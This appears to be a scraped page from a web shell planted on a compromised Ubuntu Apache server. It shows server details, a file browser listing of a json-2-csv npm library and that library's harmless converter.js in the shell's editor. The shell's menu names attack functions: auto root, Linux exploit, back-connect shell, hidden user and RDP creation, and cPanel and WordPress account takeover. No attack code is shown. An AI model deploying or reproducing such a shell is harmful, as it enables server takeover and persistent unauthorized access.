Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
json-2-csv /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
constants.d.ts
527
B
-rw-rw-r--
constants.js
1.46
KB
-rw-rw-r--
constants.js.map
1007
B
-rw-rw-r--
converter.d.ts
300
B
-rw-rw-r--
converter.js
1007
B
-rw-rw-r--
converter.js.map
726
B
-rw-rw-r--
csv2json.d.ts
163
B
-rw-rw-r--
csv2json.js
18.24
KB
-rw-rw-r--
csv2json.js.map
9.95
KB
-rw-rw-r--
json2csv.d.ts
163
B
-rw-rw-r--
json2csv.js
19.8
KB
-rw-rw-r--
json2csv.js.map
9.26
KB
-rw-rw-r--
types.d.ts
5.94
KB
-rw-rw-r--
types.js
77
B
-rw-rw-r--
types.js.map
116
B
-rw-rw-r--
utils.d.ts
3.27
KB
-rw-rw-r--
utils.js
7.93
KB
-rw-rw-r--
utils.js.map
4.74
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : converter.js
'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.csv2json = exports.json2csv = void 0; const constants_1 = require("./constants"); const json2csv_1 = require("./json2csv"); const csv2json_1 = require("./csv2json"); const utils_1 = require("./utils"); function json2csv(data, options) { const builtOptions = (0, utils_1.buildJ2COptions)(options ?? {}); // Validate the parameters before calling the converter's convert function (0, utils_1.validate)(data, utils_1.isObject, constants_1.errors.json2csv); return (0, json2csv_1.Json2Csv)(builtOptions).convert(data); } exports.json2csv = json2csv; function csv2json(data, options) { const builtOptions = (0, utils_1.buildC2JOptions)(options ?? {}); // Validate the parameters before calling the converter's convert function (0, utils_1.validate)(data, utils_1.isString, constants_1.errors.csv2json); return (0, csv2json_1.Csv2Json)(builtOptions).convert(data); } exports.csv2json = csv2json;
Close